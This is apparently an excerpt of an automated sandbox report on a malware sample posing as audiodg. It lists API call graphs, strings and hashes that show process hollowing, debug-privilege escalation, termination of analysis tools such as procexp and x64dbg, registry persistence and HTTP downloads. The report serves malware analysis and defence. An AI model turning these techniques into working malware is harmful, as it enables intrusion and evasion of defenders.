                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction ID: 74a2e36950f8e299ce9892203c61c3ebca8bfa78e19ac58bbe518265a6878e57
                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                  • Instruction Fuzzy Hash: B7D01311E3594181E755AF16F445715D3B1FBC4744FC08035E58981574CF3CD0B58F10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 332 7ff7a91b2048-7ff7a91b20c2 GetModuleFileNameW 333 7ff7a91b20c4 332->333 334 7ff7a91b20c9-7ff7a91b2105 332->334 335 7ff7a91b296d-7ff7a91b2975 333->335 336 7ff7a91b2107-7ff7a91b210f 334->336 337 7ff7a91b211d-7ff7a91b2139 call 7ff7a91b1f88 334->337 338 7ff7a91b2111-7ff7a91b2119 336->338 339 7ff7a91b213b-7ff7a91b2157 call 7ff7a91b1fc8 336->339 346 7ff7a91b217c-7ff7a91b2186 337->346 341 7ff7a91b2159-7ff7a91b2175 call 7ff7a91b2008 338->341 342 7ff7a91b211b-7ff7a91b2177 338->342 339->346 341->346 342->335 350 7ff7a91b2188 346->350 351 7ff7a91b218d-7ff7a91b21e1 CreateProcessW 346->351 350->335 352 7ff7a91b21e3 351->352 353 7ff7a91b21e8-7ff7a91b2228 CreateFileW 351->353 352->335 354 7ff7a91b222f-7ff7a91b224b GetFileSize 353->354 355 7ff7a91b222a 353->355 356 7ff7a91b2257-7ff7a91b2262 CloseHandle 354->356 357 7ff7a91b224d-7ff7a91b2255 354->357 355->335 356->335 357->356 358 7ff7a91b2267-7ff7a91b228f VirtualAlloc 357->358 359 7ff7a91b22a1-7ff7a91b22cc ReadFile 358->359 360 7ff7a91b2291-7ff7a91b229c CloseHandle 358->360 361 7ff7a91b22f1-7ff7a91b233f CloseHandle GetThreadContext 359->361 362 7ff7a91b22ce-7ff7a91b22ec VirtualFree CloseHandle 359->362 360->335 363 7ff7a91b2341-7ff7a91b2354 VirtualFree 361->363 364 7ff7a91b2359-7ff7a91b23de ReadProcessMemory GetModuleHandleA GetProcAddress 361->364 362->335 363->335 366 7ff7a91b23e0-7ff7a91b23f3 VirtualFree 364->366 367 7ff7a91b23f8-7ff7a91b2461 VirtualAllocEx 364->367 366->335 368 7ff7a91b2463-7ff7a91b2476 VirtualFree 367->368 369 7ff7a91b247b-7ff7a91b24af WriteProcessMemory 367->369 368->335 370 7ff7a91b24b1-7ff7a91b24c4 VirtualFree 369->370 371 7ff7a91b24c9-7ff7a91b24d4 369->371 370->335 372 7ff7a91b24e6-7ff7a91b24f9 371->372 373 7ff7a91b24ff-7ff7a91b2588 WriteProcessMemory 372->373 374 7ff7a91b25a7-7ff7a91b25ee 372->374 375 7ff7a91b25a2 373->375 376 7ff7a91b258a-7ff7a91b259d VirtualFree 373->376 377 7ff7a91b2600-7ff7a91b2613 374->377 375->372 376->335 379 7ff7a91b2619-7ff7a91b2668 RtlCompareMemory 377->379 380 7ff7a91b2898-7ff7a91b291c WriteProcessMemory SetThreadContext 377->380 381 7ff7a91b266a 379->381 382 7ff7a91b266c-7ff7a91b2695 379->382 383 7ff7a91b2933-7ff7a91b2943 ResumeThread 380->383 384 7ff7a91b291e-7ff7a91b2931 VirtualFree 380->384 381->377 386 7ff7a91b26a0-7ff7a91b26ae 382->386 387 7ff7a91b2945-7ff7a91b2958 VirtualFree 383->387 388 7ff7a91b295a-7ff7a91b2967 VirtualFree 383->388 384->335 389 7ff7a91b2893 386->389 390 7ff7a91b26b4-7ff7a91b273f 386->390 387->335 388->335 389->380 391 7ff7a91b2751-7ff7a91b275f 390->391 392 7ff7a91b2765-7ff7a91b2798 391->392 393 7ff7a91b288e 391->393 394 7ff7a91b279a 392->394 395 7ff7a91b279c-7ff7a91b286f ReadProcessMemory WriteProcessMemory 392->395 393->386 394->391 397 7ff7a91b2871-7ff7a91b2884 VirtualFree 395->397 398 7ff7a91b2889 395->398 397->335 398->393
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction ID: dc5f13bdc9212b6b0fe7a79189c8ef7b10761548cafd4398b57341666d079bdd
                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                  • Instruction Fuzzy Hash: 0332E732609AC186E772DF15F8547AAA3B2FB98B80F414535DA8E83B68DF3CD454CB10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction ID: 87a06f4f470b3f46ef5ab7b575e95d6d78648ed0744eb19a22ee51115dd25a02
                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                  • Instruction Fuzzy Hash: 9B416D3261DA8186E351EF55F44832EF7B1FB84754F918034EA8A86AA8CF7DD458CF10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction ID: ba24ea550f3a24acaccd85e293da3e45907fdd6a8fcc5c396d5574c61a4708af
                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                  • Instruction Fuzzy Hash: E2410032609A8586E7719F15F44436BB7B1F794B88F504429EA8C83B68CF7DD4588B40

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF7A91B1D19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction ID: e219a3160157b1090b1d65c3f7cc9d5a7552111c0384420d9c980f8dc31385ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                  • Instruction Fuzzy Hash: 7071F532619A8182E761AF50F49832AF7B1FBC4794F911035FA8E83A68CF7CD4548B20

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction ID: 9785da413cab7a7eab783ed41d9a581bd7575bd7e9e164ebfcb03b44d52b1283
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                  • Instruction Fuzzy Hash: 43810932609B8182EA51DF59F48436AE7B1FBC8B90F514135EA8D83B78DF3CD4548B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7A91B45C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B460C
                                                                                                                                                                    • Part of subcall function 00007FF7A91B45C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4649
                                                                                                                                                                    • Part of subcall function 00007FF7A91B45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3117), ref: 00007FF7A91B4654
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B311C), ref: 00007FF7A91B3BC7
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3B84: RegSetValueExW.ADVAPI32 ref: 00007FF7A91B3BFD
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3B84: RegCloseKey.ADVAPI32 ref: 00007FF7A91B3C0C
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF7A91B3C3C
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A91B3E37
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: Process32FirstW.KERNEL32 ref: 00007FF7A91B3E6A
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3E7C
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: wcscmp.MSVCRT ref: 00007FF7A91B3E91
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: OpenProcess.KERNEL32 ref: 00007FF7A91B3EA7
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: TerminateProcess.KERNEL32 ref: 00007FF7A91B3ECA
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3ED8
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: Process32NextW.KERNEL32 ref: 00007FF7A91B3EEB
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3E24: CloseHandle.KERNEL32 ref: 00007FF7A91B3EFD
                                                                                                                                                                    • Part of subcall function 00007FF7A91B39B4: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF7A91B3B0C), ref: 00007FF7A91B39E4
                                                                                                                                                                  • Sleep.KERNEL32 ref: 00007FF7A91B31C6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                  • API String ID: 2853470409-928700279
                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction ID: 97efc93cd10e2b7a864ad5ded3685053dadfc50649636a99c597bbae0abb289c
                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                  • Instruction Fuzzy Hash: C9218820A5B94294EA07FF20FD511B8E2B2EF60750FC20532E41DC25F6DE2CE93A8630

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7A91B3784
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: GetVolumeInformationW.KERNEL32 ref: 00007FF7A91B3801
                                                                                                                                                                    • Part of subcall function 00007FF7A91B3744: wsprintfW.USER32 ref: 00007FF7A91B38A2
                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B390D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3922
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3935
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3945
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3958
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B396D
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3980
                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A91B3AA9), ref: 00007FF7A91B3995
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                  • API String ID: 1846285901-4119554291
                                                                                                                                                                  • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                  • Instruction ID: 657b805cf4ec8e02042701622303c4db152eca361d1cc5c1e8b8023c7fb0cb2d
                                                                                                                                                                  • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6111212172998685DB61BF25F85476AA3B2FBC4B80F815031DA8E87E39DE3CD525C710

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction ID: 51415abe456518a1eeefa84989e04dc74184da2e6d17019409f7cc799084f17d
                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                  • Instruction Fuzzy Hash: AD01C026A0DA4181E732BF11F854269A7B2FBDCB95F850531D94EC2A74CF3CD6A58620

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction ID: 45675ad007755a6469378cd6d83b9ac62ebe8277d5d69cda1e527e70176aa337
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B210031A0EA8681E771AF15F84836AE3B2FBC4754F814235C55E829B8DF3DD565CB20
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction ID: cee3c6548fd6d34fbdbbe4bcdebb1c7db9955d7f273c30265c8c6f1c604be7c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                  • Instruction Fuzzy Hash: C401D226A1DA4182E722AF11F85426DA3B2FBD8B45F810535E98ED2A74CF2CD5548610
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
